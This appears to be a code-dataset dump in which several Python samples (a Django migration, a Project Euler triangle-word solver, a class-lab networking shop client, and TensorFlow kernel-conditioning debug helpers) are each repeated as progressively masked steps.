code
stringlengths 13
6.09M
| order_type
stringclasses 2
values | original_example
dict | step_ids
listlengths 1
5
|
---|---|---|---|
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
    """Re-add the announcements->classroom link under the name ``classrm``.

    Follows migration 0003, which removed the original ``classroom``
    field from the ``anouncements`` model (model name sic).
    """
    # Must run after the field removal in 0003.
    dependencies = [('classroom', '0003_remove_anouncements_classroom')]
    # Nullable FK so existing rows stay valid; CASCADE deletes an
    # announcement when its classroom is deleted.
    operations = [migrations.AddField(model_name='anouncements', name=
        'classrm', field=models.ForeignKey(blank=True, null=True, on_delete
        =django.db.models.deletion.CASCADE, related_name='anouncements', to
        ='classroom.Classroom'))]
<|reserved_special_token_1|>
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Re-add the announcements->classroom link under the name ``classrm``.

    Follows migration 0003, which removed the original ``classroom``
    field from the ``anouncements`` model (model name sic).
    """
    # Must run after the field removal in 0003.
    dependencies = [('classroom', '0003_remove_anouncements_classroom')]
    # Nullable FK so existing rows stay valid; CASCADE deletes an
    # announcement when its classroom is deleted.
    operations = [migrations.AddField(model_name='anouncements', name=
        'classrm', field=models.ForeignKey(blank=True, null=True, on_delete
        =django.db.models.deletion.CASCADE, related_name='anouncements', to
        ='classroom.Classroom'))]
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-05-22 00:19
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Re-add the announcements->classroom link under the name ``classrm``.

    Follows migration 0003, which removed the original ``classroom``
    field from the ``anouncements`` model (model name sic).
    """
    # Must run after the field removal in 0003.
    dependencies = [
        ('classroom', '0003_remove_anouncements_classroom'),
    ]
    operations = [
        migrations.AddField(
            model_name='anouncements',
            name='classrm',
            # Nullable so existing rows stay valid; CASCADE removes an
            # announcement when its classroom is deleted.
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='anouncements', to='classroom.Classroom'),
        ),
    ]
|
flexible
|
{
"blob_id": "e9659555938211d067919ee5e0083efb29d42d7b",
"index": 8600,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('classroom', '0003_remove_anouncements_classroom')]\n operations = [migrations.AddField(model_name='anouncements', name=\n 'classrm', field=models.ForeignKey(blank=True, null=True, on_delete\n =django.db.models.deletion.CASCADE, related_name='anouncements', to\n ='classroom.Classroom'))]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n dependencies = [('classroom', '0003_remove_anouncements_classroom')]\n operations = [migrations.AddField(model_name='anouncements', name=\n 'classrm', field=models.ForeignKey(blank=True, null=True, on_delete\n =django.db.models.deletion.CASCADE, related_name='anouncements', to\n ='classroom.Classroom'))]\n",
"step-5": "# -*- coding: utf-8 -*-\n# Generated by Django 1.10.5 on 2017-05-22 00:19\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('classroom', '0003_remove_anouncements_classroom'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='anouncements',\n name='classrm',\n field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='anouncements', to='classroom.Classroom'),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def is_triangle_number(n):
    """Return True if n is a triangle number, i.e. n == k*(k+1)/2 for some integer k."""
    # Invert n = k(k+1)/2 with the quadratic formula; n is triangular
    # exactly when the positive root is a whole number.
    # NOTE(review): float sqrt may lose precision for very large n — confirm range.
    root = (-1 + math.sqrt(1 + 8.0 * n)) / 2
    if root.is_integer():
        return True
    return False
def calculation():
    """Count how many words in the module-level string_list are triangle words and print the total."""
    count = 0
    for word in string_list:
        # Word value: sum of each letter's alphabetical position (char_dict).
        sum = 0  # NOTE(review): shadows the builtin ``sum``
        for char in word:
            sum += char_dict[char]
        if is_triangle_number(sum):
            count += 1
    print(count)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
fin.close()
<|reserved_special_token_0|>
def is_triangle_number(n):
    """Return True if n is a triangle number, i.e. n == k*(k+1)/2 for some integer k."""
    # Invert n = k(k+1)/2 with the quadratic formula; n is triangular
    # exactly when the positive root is a whole number.
    # NOTE(review): float sqrt may lose precision for very large n — confirm range.
    root = (-1 + math.sqrt(1 + 8.0 * n)) / 2
    if root.is_integer():
        return True
    return False
def calculation():
    """Count how many words in the module-level string_list are triangle words and print the total."""
    count = 0
    for word in string_list:
        # Word value: sum of each letter's alphabetical position (char_dict).
        sum = 0  # NOTE(review): shadows the builtin ``sum``
        for char in word:
            sum += char_dict[char]
        if is_triangle_number(sum):
            count += 1
    print(count)
calculation()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
# Read the single comma-separated line of quoted words from disk.
fin = open(
    'D:\\OneDrive\\Study\\Self learning\\Coding\\Project Euler\\data\\Problem 42\\p042_words.txt'
    , 'r')
string_content = fin.readline()
fin.close()
# Letter -> alphabetical position (A=1 .. Z=26).
char_dict = {'A': 1, 'B': 2, 'C': 3, 'D': 4, 'E': 5, 'F': 6, 'G': 7, 'H': 8,
    'I': 9, 'J': 10, 'K': 11, 'L': 12, 'M': 13, 'N': 14, 'O': 15, 'P': 16,
    'Q': 17, 'R': 18, 'S': 19, 'T': 20, 'U': 21, 'V': 22, 'W': 23, 'X': 24,
    'Y': 25, 'Z': 26}
# Strip the surrounding quotes and split into individual words.
string_list = list()
string_list = string_content.replace('"', '').split(',')
def is_triangle_number(n):
    """Return True if n is a triangle number, i.e. n == k*(k+1)/2 for some integer k."""
    # Invert n = k(k+1)/2 with the quadratic formula; n is triangular
    # exactly when the positive root is a whole number.
    # NOTE(review): float sqrt may lose precision for very large n — confirm range.
    root = (-1 + math.sqrt(1 + 8.0 * n)) / 2
    if root.is_integer():
        return True
    return False
def calculation():
    """Count how many words in the module-level string_list are triangle words and print the total."""
    count = 0
    for word in string_list:
        # Word value: sum of each letter's alphabetical position (char_dict).
        sum = 0  # NOTE(review): shadows the builtin ``sum``
        for char in word:
            sum += char_dict[char]
        if is_triangle_number(sum):
            count += 1
    print(count)
calculation()
<|reserved_special_token_1|>
import math
import time
# Read the word list: a single line of quoted, comma-separated words.
# ``with`` guarantees the handle is closed even if readline() raises
# (the original open/readline/close leaked the handle on error).
with open(
    'D:\\OneDrive\\Study\\Self learning\\Coding\\Project Euler\\data\\Problem 42\\p042_words.txt'
    , 'r') as fin:
    string_content = fin.readline()
# Letter -> alphabetical position (A=1 .. Z=26), generated instead of a
# 26-entry hand-written literal.
char_dict = {chr(ord('A') + i): i + 1 for i in range(26)}
# Strip the quotes and split into individual words (the redundant
# ``string_list = list()`` pre-assignment is removed).
string_list = string_content.replace('"', '').split(',')
def is_triangle_number(n):
    """Return True if ``n`` is a triangle number (n == k*(k+1)/2 for some k >= 0).

    n is triangular exactly when 8n + 1 is a perfect square, because
    8 * k(k+1)/2 + 1 == (2k+1)**2. Using ``math.isqrt`` keeps the test
    exact for arbitrarily large integers, unlike the original
    ``math.sqrt``-based check, which can misclassify once the float
    loses integer precision.
    """
    disc = 8 * n + 1
    root = math.isqrt(disc)
    return root * root == disc
def calculation():
    """Count the triangle words in the module-level ``string_list`` and print the total."""
    triangle_words = 0
    for word in string_list:
        # Word value: sum of the letters' alphabetical positions.
        value = sum(char_dict[letter] for letter in word)
        if is_triangle_number(value):
            triangle_words += 1
    print(triangle_words)
calculation()
<|reserved_special_token_1|>
# Project Euler, Problem 42 — Coded triangle numbers.
#
# The nth term of the sequence of triangle numbers is tn = n(n+1)/2; the
# first ten triangle numbers are: 1, 3, 6, 10, 15, 21, 28, 36, 45, 55, ...
# By converting each letter in a word to its alphabetical position and
# adding these values we form a word value (e.g. SKY -> 19+11+25 = 55 = t10).
# If the word value is a triangle number, the word is a triangle word.
# Using words.txt (~2000 common English words), how many are triangle words?
# ANSWER: 162

import math
import time  # NOTE(review): unused here; kept to preserve module side effects

# Get Data — raw string fixes the invalid escape sequences ("\P", "\d", ...)
# the original literal relied on (a SyntaxWarning on modern Python), and
# ``with`` guarantees the handle is closed even on error.
with open(r"D:\OneDrive\Study\Self learning\Coding\Project Euler\data\Problem 42\p042_words.txt", "r") as fin:
    string_content = fin.readline()

# Letter -> alphabetical position (A=1 .. Z=26).
char_dict = {chr(ord("A") + i): i + 1 for i in range(26)}

# Split the single quoted, comma-separated line into a list of words.
string_list = string_content.replace('"', '').split(',')

def is_triangle_number(n):
    """Return True if n is a triangle number (n == k*(k+1)/2 for some k >= 0)."""
    # n is triangular iff 8n + 1 is a perfect square, since
    # 8*k(k+1)/2 + 1 == (2k+1)**2. Exact integer math avoids the float
    # precision loss of the original sqrt-based check.
    disc = 8 * n + 1
    root = math.isqrt(disc)
    return root * root == disc

def calculation():
    """Count the triangle words in string_list and print the total."""
    count = 0
    for word in string_list:
        # Word value: sum of the letters' alphabetical positions.
        value = sum(char_dict[char] for char in word)
        if is_triangle_number(value):
            count += 1
    print(count)

calculation()
|
flexible
|
{
"blob_id": "61019a5439a6f0c1aee51db9b048a26fb9b5bf5d",
"index": 8257,
"step-1": "<mask token>\n\n\ndef is_triangle_number(n):\n root = (-1 + math.sqrt(1 + 8.0 * n)) / 2\n if root.is_integer():\n return True\n return False\n\n\ndef calculation():\n count = 0\n for word in string_list:\n sum = 0\n for char in word:\n sum += char_dict[char]\n if is_triangle_number(sum):\n count += 1\n print(count)\n\n\n<mask token>\n",
"step-2": "<mask token>\nfin.close()\n<mask token>\n\n\ndef is_triangle_number(n):\n root = (-1 + math.sqrt(1 + 8.0 * n)) / 2\n if root.is_integer():\n return True\n return False\n\n\ndef calculation():\n count = 0\n for word in string_list:\n sum = 0\n for char in word:\n sum += char_dict[char]\n if is_triangle_number(sum):\n count += 1\n print(count)\n\n\ncalculation()\n",
"step-3": "<mask token>\nfin = open(\n 'D:\\\\OneDrive\\\\Study\\\\Self learning\\\\Coding\\\\Project Euler\\\\data\\\\Problem 42\\\\p042_words.txt'\n , 'r')\nstring_content = fin.readline()\nfin.close()\nchar_dict = {'A': 1, 'B': 2, 'C': 3, 'D': 4, 'E': 5, 'F': 6, 'G': 7, 'H': 8,\n 'I': 9, 'J': 10, 'K': 11, 'L': 12, 'M': 13, 'N': 14, 'O': 15, 'P': 16,\n 'Q': 17, 'R': 18, 'S': 19, 'T': 20, 'U': 21, 'V': 22, 'W': 23, 'X': 24,\n 'Y': 25, 'Z': 26}\nstring_list = list()\nstring_list = string_content.replace('\"', '').split(',')\n\n\ndef is_triangle_number(n):\n root = (-1 + math.sqrt(1 + 8.0 * n)) / 2\n if root.is_integer():\n return True\n return False\n\n\ndef calculation():\n count = 0\n for word in string_list:\n sum = 0\n for char in word:\n sum += char_dict[char]\n if is_triangle_number(sum):\n count += 1\n print(count)\n\n\ncalculation()\n",
"step-4": "import math\nimport time\nfin = open(\n 'D:\\\\OneDrive\\\\Study\\\\Self learning\\\\Coding\\\\Project Euler\\\\data\\\\Problem 42\\\\p042_words.txt'\n , 'r')\nstring_content = fin.readline()\nfin.close()\nchar_dict = {'A': 1, 'B': 2, 'C': 3, 'D': 4, 'E': 5, 'F': 6, 'G': 7, 'H': 8,\n 'I': 9, 'J': 10, 'K': 11, 'L': 12, 'M': 13, 'N': 14, 'O': 15, 'P': 16,\n 'Q': 17, 'R': 18, 'S': 19, 'T': 20, 'U': 21, 'V': 22, 'W': 23, 'X': 24,\n 'Y': 25, 'Z': 26}\nstring_list = list()\nstring_list = string_content.replace('\"', '').split(',')\n\n\ndef is_triangle_number(n):\n root = (-1 + math.sqrt(1 + 8.0 * n)) / 2\n if root.is_integer():\n return True\n return False\n\n\ndef calculation():\n count = 0\n for word in string_list:\n sum = 0\n for char in word:\n sum += char_dict[char]\n if is_triangle_number(sum):\n count += 1\n print(count)\n\n\ncalculation()\n",
"step-5": "# The nth term of the sequence of triangle numbers is given by, tn = ½n(n+1); so the first ten triangle numbers are:\n# 1, 3, 6, 10, 15, 21, 28, 36, 45, 55, ...\n# By converting each letter in a word to a number corresponding to its alphabetical position and adding these values we form a word value. For example, the word value for SKY is 19 + 11 + 25 = 55 = t10. If the word value is a triangle number then we shall call the word a triangle word.\n# Using words.txt (right click and 'Save Link/Target As...'), a 16K text file containing nearly two-thousand common English words, how many are triangle words?\n# ANSWER: 162\n\nimport math\nimport time\n# Get Data\nfin=open(\"D:\\OneDrive\\Study\\Self learning\\Coding\\Project Euler\\data\\Problem 42\\p042_words.txt\",\"r\")\nstring_content=fin.readline()\nfin.close()\n\nchar_dict={\"A\":1,\"B\":2,\"C\":3,\"D\":4,\"E\":5,\"F\":6,\"G\":7,\"H\":8,\"I\":9,\"J\":10,\"K\":11,\"L\":12,\"M\":13, \"N\":14,\"O\":15,\"P\":16,\"Q\":17,\"R\":18,\"S\":19,\"T\":20,\"U\":21,\"V\":22,\"W\":23,\"X\":24,\"Y\":25,\"Z\":26}\n\n# Split data into element of a list\nstring_list=list()\nstring_list=string_content.replace('\"','').split(',')\n\n# Check if it is tran\ndef is_triangle_number(n):\n # Check if root is integer\n root=(-1+math.sqrt(1+8.0*n))/2\n if root.is_integer():\n return True\n return False \n\ndef calculation():\n count=0\n # For each word in string list\n for word in string_list:\n sum=0\n # For each char in each word\n for char in word:\n sum += char_dict[char]\n if is_triangle_number(sum):\n count +=1\n print(count)\ncalculation()\n\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
from netsec_2017.Lab_3.packets import RequestItem, RequestMoney, RequestToBuy, FinishTransaction, SendItem, SendMoney
from netsec_2017.Lab_3.PLS.client import PLSClient, PLSStackingTransport
from netsec_2017.Lab_3.peepTCP import PeepClientTransport, PEEPClient
import asyncio
import playground
import random, logging
from playground import getConnector
from playground.network.packet import PacketType
from playground.network.packet.fieldtypes import UINT32, STRING, UINT16, UINT8, BUFFER
from playground.network.packet.fieldtypes.attributes import Optional
from playground.network.common.Protocol import StackingProtocol, StackingProtocolFactory, StackingTransport
import zlib
import sys
class ShopClientProtocol(asyncio.Protocol):
    """Client side of a toy shop transaction over the playground stack.

    Drives a fixed packet exchange: send RequestToBuy, then answer
    RequestItem with SendItem, RequestMoney with SendMoney, and close on
    FinishTransaction. ``clientstate`` tracks progress so out-of-order
    packets abort the connection.
    """
    # 0 = waiting for RequestItem, 1 = waiting for RequestMoney,
    # 2 = waiting for FinishTransaction. Class-level default; the first
    # ``self.clientstate += 1`` creates a per-instance copy.
    clientstate = 0
    def __init__(self, loop):
        # loop: asyncio event loop, stopped when the connection closes.
        self.transport = None
        self.loop = loop
        self.deserializer = PacketType.Deserializer()
    def connection_made(self, transport):
        """Kick off the transaction as soon as the connection is up."""
        print("ShopClient connection_made is called\n")
        self.transport = transport
        # PACKET 1 - Request to Buy packet
        startbuy = RequestToBuy()
        print("Sending Request to Buy")
        self.transport.write(startbuy.__serialize__())
    def data_received(self, data):
        """Feed incoming bytes to the deserializer and answer each packet.

        Any packet that does not match the expected type for the current
        ``clientstate`` aborts the transaction by closing the transport.
        """
        print("ShopClient Data_received is called")
        self.deserializer.update(data)
        for pkt in self.deserializer.nextPackets():
            if isinstance(pkt, RequestItem) and self.clientstate == 0:
                self.clientstate += 1
                # PACKET 3 - Send Item packet
                item = "Butter"
                response = SendItem()
                response.Item = item
                print("Sent SendItem")
                self.transport.write(response.__serialize__())
            elif isinstance(pkt, RequestMoney) and self.clientstate == 1:
                self.clientstate += 1
                # PACKET 5 - Send Money packet; echo back the requested amount.
                response = SendMoney()
                response.Cash = pkt.Amount
                print("Sent SendMoney")
                self.transport.write(response.__serialize__())
            elif isinstance(pkt, FinishTransaction) and self.clientstate == 2:
                # Transaction complete - close our end of the connection.
                self.transport.close()
            else:
                # Unexpected packet for the current state: abort.
                # NOTE(review): assumes every packet type exposes a ``Type``
                # attribute — confirm against the packet definitions.
                print(pkt.Type)
                print("Client Received Incorrect Packet. Closing Connection. Try Again!")
                self.transport.close()
    def connection_lost(self,exc):
        """Tear down on disconnect and stop the event loop."""
        print('\nThe ShopServer sent a connection close to the client')
        # NOTE(review): transport may already be closed/None here if we
        # initiated the close — confirm the framework tolerates a second close.
        self.transport.close()
        self.transport = None
        self.loop.stop()
class initiate():
    """Protocol factory handed to playground's connection creator.

    Stores the event loop and builds a fresh ShopClientProtocol for each
    connection attempt.
    """

    def __init__(self, loop):
        # loop: asyncio event loop forwarded to the protocol.
        self.loop = loop

    def send_first_packet(self):
        """Create the client protocol for a new connection.

        Bug fix: the original read the module-level ``loop`` global (and
        pointlessly reassigned ``self.loop`` from it), which breaks when
        the class is used outside the ``__main__`` script. Use the loop
        captured at construction time instead.
        """
        return ShopClientProtocol(self.loop)
if __name__ == "__main__":
    loop = asyncio.get_event_loop()
    # Debug toggles (left disabled):
    #logging.getLogger().setLevel(logging.NOTSET) # this logs *everything*
    #logging.getLogger().addHandler(logging.StreamHandler()) # logs to stderr
    # Stack PLS (security) on top of PEEP (transport) for the client side.
    f = StackingProtocolFactory(lambda:PLSClient(), lambda: PEEPClient(loop))
    ptConnector = playground.Connector(protocolStack=f)
    playground.setConnector("passthrough", ptConnector)
    go = initiate(loop)
    # Connect to the shop server at playground address 20174.1.1.1, port 8888.
    coro = playground.getConnector('passthrough').create_playground_connection(go.send_first_packet, '20174.1.1.1', 8888)
    client = loop.run_until_complete(coro)
    # Serve requests until Ctrl+C is pressed
    try:
        loop.run_forever()
    except KeyboardInterrupt:
        pass
    # Close the server
    loop.close()
|
normal
|
{
"blob_id": "a12f9435eb4b090bc73be14ad64fdf43c5caa4d2",
"index": 7471,
"step-1": "<mask token>\n\n\nclass ShopClientProtocol(asyncio.Protocol):\n <mask token>\n <mask token>\n\n def connection_made(self, transport):\n print('ShopClient connection_made is called\\n')\n self.transport = transport\n startbuy = RequestToBuy()\n print('Sending Request to Buy')\n self.transport.write(startbuy.__serialize__())\n <mask token>\n <mask token>\n\n\nclass initiate:\n\n def __init__(self, loop):\n self.loop = loop\n\n def send_first_packet(self):\n self.loop = loop\n return ShopClientProtocol(loop)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ShopClientProtocol(asyncio.Protocol):\n <mask token>\n <mask token>\n\n def connection_made(self, transport):\n print('ShopClient connection_made is called\\n')\n self.transport = transport\n startbuy = RequestToBuy()\n print('Sending Request to Buy')\n self.transport.write(startbuy.__serialize__())\n\n def data_received(self, data):\n print('ShopClient Data_received is called')\n self.deserializer.update(data)\n for pkt in self.deserializer.nextPackets():\n if isinstance(pkt, RequestItem) and self.clientstate == 0:\n self.clientstate += 1\n item = 'Butter'\n response = SendItem()\n response.Item = item\n print('Sent SendItem')\n self.transport.write(response.__serialize__())\n elif isinstance(pkt, RequestMoney) and self.clientstate == 1:\n self.clientstate += 1\n response = SendMoney()\n response.Cash = pkt.Amount\n print('Sent SendMoney')\n self.transport.write(response.__serialize__())\n elif isinstance(pkt, FinishTransaction) and self.clientstate == 2:\n self.transport.close()\n else:\n print(pkt.Type)\n print(\n 'Client Received Incorrect Packet. Closing Connection. Try Again!'\n )\n self.transport.close()\n\n def connection_lost(self, exc):\n print('\\nThe ShopServer sent a connection close to the client')\n self.transport.close()\n self.transport = None\n self.loop.stop()\n\n\nclass initiate:\n\n def __init__(self, loop):\n self.loop = loop\n\n def send_first_packet(self):\n self.loop = loop\n return ShopClientProtocol(loop)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass ShopClientProtocol(asyncio.Protocol):\n clientstate = 0\n\n def __init__(self, loop):\n self.transport = None\n self.loop = loop\n self.deserializer = PacketType.Deserializer()\n\n def connection_made(self, transport):\n print('ShopClient connection_made is called\\n')\n self.transport = transport\n startbuy = RequestToBuy()\n print('Sending Request to Buy')\n self.transport.write(startbuy.__serialize__())\n\n def data_received(self, data):\n print('ShopClient Data_received is called')\n self.deserializer.update(data)\n for pkt in self.deserializer.nextPackets():\n if isinstance(pkt, RequestItem) and self.clientstate == 0:\n self.clientstate += 1\n item = 'Butter'\n response = SendItem()\n response.Item = item\n print('Sent SendItem')\n self.transport.write(response.__serialize__())\n elif isinstance(pkt, RequestMoney) and self.clientstate == 1:\n self.clientstate += 1\n response = SendMoney()\n response.Cash = pkt.Amount\n print('Sent SendMoney')\n self.transport.write(response.__serialize__())\n elif isinstance(pkt, FinishTransaction) and self.clientstate == 2:\n self.transport.close()\n else:\n print(pkt.Type)\n print(\n 'Client Received Incorrect Packet. Closing Connection. Try Again!'\n )\n self.transport.close()\n\n def connection_lost(self, exc):\n print('\\nThe ShopServer sent a connection close to the client')\n self.transport.close()\n self.transport = None\n self.loop.stop()\n\n\nclass initiate:\n\n def __init__(self, loop):\n self.loop = loop\n\n def send_first_packet(self):\n self.loop = loop\n return ShopClientProtocol(loop)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass ShopClientProtocol(asyncio.Protocol):\n clientstate = 0\n\n def __init__(self, loop):\n self.transport = None\n self.loop = loop\n self.deserializer = PacketType.Deserializer()\n\n def connection_made(self, transport):\n print('ShopClient connection_made is called\\n')\n self.transport = transport\n startbuy = RequestToBuy()\n print('Sending Request to Buy')\n self.transport.write(startbuy.__serialize__())\n\n def data_received(self, data):\n print('ShopClient Data_received is called')\n self.deserializer.update(data)\n for pkt in self.deserializer.nextPackets():\n if isinstance(pkt, RequestItem) and self.clientstate == 0:\n self.clientstate += 1\n item = 'Butter'\n response = SendItem()\n response.Item = item\n print('Sent SendItem')\n self.transport.write(response.__serialize__())\n elif isinstance(pkt, RequestMoney) and self.clientstate == 1:\n self.clientstate += 1\n response = SendMoney()\n response.Cash = pkt.Amount\n print('Sent SendMoney')\n self.transport.write(response.__serialize__())\n elif isinstance(pkt, FinishTransaction) and self.clientstate == 2:\n self.transport.close()\n else:\n print(pkt.Type)\n print(\n 'Client Received Incorrect Packet. Closing Connection. 
Try Again!'\n )\n self.transport.close()\n\n def connection_lost(self, exc):\n print('\\nThe ShopServer sent a connection close to the client')\n self.transport.close()\n self.transport = None\n self.loop.stop()\n\n\nclass initiate:\n\n def __init__(self, loop):\n self.loop = loop\n\n def send_first_packet(self):\n self.loop = loop\n return ShopClientProtocol(loop)\n\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n f = StackingProtocolFactory(lambda : PLSClient(), lambda : PEEPClient(loop)\n )\n ptConnector = playground.Connector(protocolStack=f)\n playground.setConnector('passthrough', ptConnector)\n go = initiate(loop)\n coro = playground.getConnector('passthrough').create_playground_connection(\n go.send_first_packet, '20174.1.1.1', 8888)\n client = loop.run_until_complete(coro)\n try:\n loop.run_forever()\n except KeyboardInterrupt:\n pass\n loop.close()\n",
"step-5": "from netsec_2017.Lab_3.packets import RequestItem, RequestMoney, RequestToBuy, FinishTransaction, SendItem, SendMoney\nfrom netsec_2017.Lab_3.PLS.client import PLSClient, PLSStackingTransport\nfrom netsec_2017.Lab_3.peepTCP import PeepClientTransport, PEEPClient\nimport asyncio\nimport playground\nimport random, logging\nfrom playground import getConnector\nfrom playground.network.packet import PacketType\nfrom playground.network.packet.fieldtypes import UINT32, STRING, UINT16, UINT8, BUFFER\nfrom playground.network.packet.fieldtypes.attributes import Optional\nfrom playground.network.common.Protocol import StackingProtocol, StackingProtocolFactory, StackingTransport\nimport zlib\nimport sys\n\n\nclass ShopClientProtocol(asyncio.Protocol):\n\n clientstate = 0\n\n def __init__(self, loop):\n #self.loop = loop\n self.transport = None\n self.loop = loop\n self.deserializer = PacketType.Deserializer()\n\n def connection_made(self, transport):\n print(\"ShopClient connection_made is called\\n\")\n self.transport = transport\n # PACKET 1 - Request to Buy packet\n startbuy = RequestToBuy()\n print(\"Sending Request to Buy\")\n self.transport.write(startbuy.__serialize__())\n\n def data_received(self, data):\n print(\"ShopClient Data_received is called\")\n self.deserializer.update(data)\n #print(data)\n for pkt in self.deserializer.nextPackets():\n #print(\"Client <------------{}------------- Server\".format(pkt.DEFINITION_IDENTIFIER))\n\n if isinstance(pkt, RequestItem) and self.clientstate == 0:\n self.clientstate += 1\n\n # PACKET 3 - Send Item packet\n item = \"Butter\"\n response = SendItem()\n response.Item = item\n\n print(\"Sent SendItem\")\n self.transport.write(response.__serialize__())\n\n\n elif isinstance(pkt, RequestMoney) and self.clientstate == 1:\n self.clientstate += 1\n\n # PACKET 5 - Send Money packet\n response = SendMoney()\n\n response.Cash = pkt.Amount\n\n print(\"Sent SendMoney\")\n self.transport.write(response.__serialize__())\n\n 
elif isinstance(pkt, FinishTransaction) and self.clientstate == 2:\n\n self.transport.close()\n\n else:\n print(pkt.Type)\n print(\"Client Received Incorrect Packet. Closing Connection. Try Again!\")\n self.transport.close()\n\n\n def connection_lost(self,exc):\n print('\\nThe ShopServer sent a connection close to the client')\n self.transport.close()\n self.transport = None\n self.loop.stop()\n\n\nclass initiate():\n #1\n def __init__(self, loop):\n self.loop = loop\n\n def send_first_packet(self):\n self.loop = loop\n return ShopClientProtocol(loop)\n\nif __name__ == \"__main__\":\n\n loop = asyncio.get_event_loop()\n\n #logging.getLogger().setLevel(logging.NOTSET) # this logs *everything*\n #logging.getLogger().addHandler(logging.StreamHandler()) # logs to stderr\n\n f = StackingProtocolFactory(lambda:PLSClient(), lambda: PEEPClient(loop))\n ptConnector = playground.Connector(protocolStack=f)\n playground.setConnector(\"passthrough\", ptConnector)\n go = initiate(loop)\n coro = playground.getConnector('passthrough').create_playground_connection(go.send_first_packet, '20174.1.1.1', 8888)\n client = loop.run_until_complete(coro)\n # Serve requests until Ctrl+C is pressed\n try:\n loop.run_forever()\n except KeyboardInterrupt:\n pass\n\n # Close the server\n loop.close()\n",
"step-ids": [
5,
7,
9,
10,
12
]
}
|
[
5,
7,
9,
10,
12
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def debug_inference(inference, dummy, entropy, cross_entropy,
    expected_log_likelhood):
    """Attach print side effects for the three ELBO terms to ``dummy``.

    Each tf.Print wraps ``dummy`` so the values are logged whenever the
    returned tensor is evaluated; ``inference`` is currently unused.
    (Parameter name "likelhood" is a typo kept for caller compatibility.)
    """
    dummy = tf.Print(dummy, [entropy], 'entropy: ')
    dummy = tf.Print(dummy, [cross_entropy], 'cross_entropy: ')
    dummy = tf.Print(dummy, [expected_log_likelhood],
        'expected_log_likelhood: ')
    return dummy
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def debug_inference(inference, dummy, entropy, cross_entropy,
    expected_log_likelhood):
    """Attach print side effects for the three ELBO terms to ``dummy``.

    Each tf.Print wraps ``dummy`` so the values are logged whenever the
    returned tensor is evaluated; ``inference`` is currently unused.
    (Parameter name "likelhood" is a typo kept for caller compatibility.)
    """
    dummy = tf.Print(dummy, [entropy], 'entropy: ')
    dummy = tf.Print(dummy, [cross_entropy], 'cross_entropy: ')
    dummy = tf.Print(dummy, [expected_log_likelhood],
        'expected_log_likelhood: ')
    return dummy
def matrix_conditions(session, inference):
    """Print conditioning diagnostics for every latent (F) and mixing (W) kernel.

    For each kernel, evaluates the inducing-point Gram matrix K_zz (with
    jitter) and prints its condition number, the kernel's sigma and
    length scales, and the matrix itself.
    """
    # Latent-function kernels F(j).
    for j in range(inference.num_latent):
        k_j = inference.kern_f[j]
        K_zz_f = k_j.kernel(inference.inducing_locations, inference.
            inducing_locations, jitter=True)
        mat = K_zz_f.eval(session=session)
        cond = np.linalg.cond(mat)
        sigma = k_j.sigma.eval(session=session)
        ls = k_j.length_scales.eval(session=session)
        print('MATRIX CONDITION F(' + str(j) + '): ', cond)
        print('SIGMA F(' + str(j) + '): ', sigma)
        print('LENGTH_SCALES F(' + str(j) + '): ', ls)
        print(mat)
    # Mixing-weight kernels W(i, j) — same diagnostics per output/latent pair.
    for j in range(inference.num_latent):
        for i in range(inference.num_outputs):
            k_ij = inference.kern_w[i][j]
            K_zz_w = k_ij.kernel(inference.inducing_locations, inference.
                inducing_locations, jitter=True)
            mat = K_zz_w.eval(session=session)
            cond = np.linalg.cond(mat)
            sigma = k_ij.sigma.eval(session=session)
            ls = k_ij.length_scales.eval(session=session)
            print('MATRIX CONDITION W(' + str(i) + ',' + str(j) + '): ', cond)
            print('SIGMA W(' + str(i) + ',' + str(j) + '): ', sigma)
            print('LENGTH_SCALES W(' + str(i) + ',' + str(j) + '): ', ls)
            print(mat)
<|reserved_special_token_1|>
import numpy as np
import tensorflow as tf
import math
from .. import util
def debug_inference(inference, dummy, entropy, cross_entropy,
    expected_log_likelhood):
    """Attach print side effects for the three ELBO terms to ``dummy``.

    Each tf.Print wraps ``dummy`` so the values are logged whenever the
    returned tensor is evaluated; ``inference`` is currently unused.
    (Parameter name "likelhood" is a typo kept for caller compatibility.)
    """
    dummy = tf.Print(dummy, [entropy], 'entropy: ')
    dummy = tf.Print(dummy, [cross_entropy], 'cross_entropy: ')
    dummy = tf.Print(dummy, [expected_log_likelhood],
        'expected_log_likelhood: ')
    return dummy
def matrix_conditions(session, inference):
    """Print conditioning diagnostics for every latent (F) and mixing (W) kernel.

    For each kernel, evaluates the inducing-point Gram matrix K_zz (with
    jitter) and prints its condition number, the kernel's sigma and
    length scales, and the matrix itself.
    """
